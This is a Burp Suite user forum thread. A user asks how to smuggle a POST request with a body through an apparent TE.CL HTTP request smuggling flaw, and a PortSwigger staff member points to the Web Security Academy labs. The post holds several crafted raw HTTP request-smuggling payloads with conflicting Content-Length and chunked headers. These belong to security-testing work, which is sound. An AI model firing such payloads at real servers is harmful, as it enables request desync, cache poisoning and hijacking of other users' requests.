Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

HTTP Request Smuggling POST Request with Body

Wyatt | Last updated: May 28, 2020 04:25PM UTC

Hi Portswigger Team, I have identified a potential TE.CL HTTP Request Smuggling vulnerability through Burpsuite's scanner and can verify it with the HTTP Request Smuggler extension. I'm having difficulty exploiting it and am looking for guidance on how to smuggle my POST data in a request. The example online (https://portswigger.net/web-security/request-smuggling) shows a POST request without a body being sent: POST / HTTP/1.1 Host: vulnerable-website.com Content-Length: 3 Transfer-Encoding: chunked 8 SMUGGLED 0 -- The differential response portion starts with a POST request without a body and then smuggles a GET request: POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 144 x= 0 -- I'm struggling to create a proof of concept where two POST requests with data are sent, where each have a body. The HTTP Request Smuggler identifies two requests that are subject to smuggling: POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/json Content-Length: 23 Transfer-Encoding: chunked d {"foo":"bar"} 0 --- And POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/json Content-Length: 24 Transfer-Encoding: chunked d {"foo":"bar"} 0 X -- This format indicates to me that this is TE.CL. When I click Smuggle Attack (TE.CL) on the request, the turbo intruder payload will replace '0\r\n\r\n' with the hexadecimal size of the smuggled request plus the prefix and then finally '\r\n0\r\n\r\n'. For example if I want to smuggle the following request my prefix variable is set to: '''POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/json Content-Length: 13 {"foo":"foo"}''' This ends up creating an attack request that looks like the following: POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/json Content-length: 22 Transfer-Encoding: chunked d {"foo":"bar"} 78 POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/json Content-Length: 13 {"foo":"foo"} 0 --- My expectation is that if request smuggling works is that one of the poisoned responses would return the data for {"foo":"foo"} instead of {"foo":"bar"}. I'm unfortunately getting a 400 response when I try to send data along with an additional POST request with data. Is it possible to smuggle POST data along with an additional POST request? Are my content-length or chunked count's incorrect?

Michelle, PortSwigger Agent | Last updated: May 29, 2020 08:10AM UTC

You might find some of the information on the Web Security Academy helpful https://portswigger.net/web-security/request-smuggling. There are quite a few labs to try out, the solutions for the labs are included so it might help to have a go at solving these labs and then use those examples to help work on your own requests.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.